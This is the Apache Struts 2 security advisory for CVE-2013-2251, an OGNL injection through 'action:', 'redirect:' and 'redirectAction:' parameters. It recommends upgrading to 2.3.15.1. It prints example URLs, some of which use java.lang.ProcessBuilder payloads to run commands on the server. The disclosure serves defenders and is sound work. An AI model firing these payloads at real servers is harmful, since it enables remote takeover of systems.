Summary


Excerpt

A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution


Who should read this

All Struts 2 developers and users

Impact of vulnerability

Remote command execution

Maximum security rating

Highly Critical

Recommendation

Developers should immediately upgrade to Struts 2.3.15.1

Affected Software

Struts 2.0.0 - Struts 2.3.15

Reporter

Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE Identifier

CVE-2013-2251

Problem

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

...

  1. Simple Expression - the parameter names are evaluated as OGNL. In the URLs below, %25 is the URL-encoded "%", so the server sees a parameter named action:%{3*4} (or redirect:%{3*4}).

    1. Code Block
      http://host/struts2-blank/example/X.action?action:%25{3*4}

    2. Code Block
      http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

  2. Command Execution - the example method index 6 may vary on different JVMs

    1. Code Block
      http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

    2. Code Block
      http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

    3. Code Block
      http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


...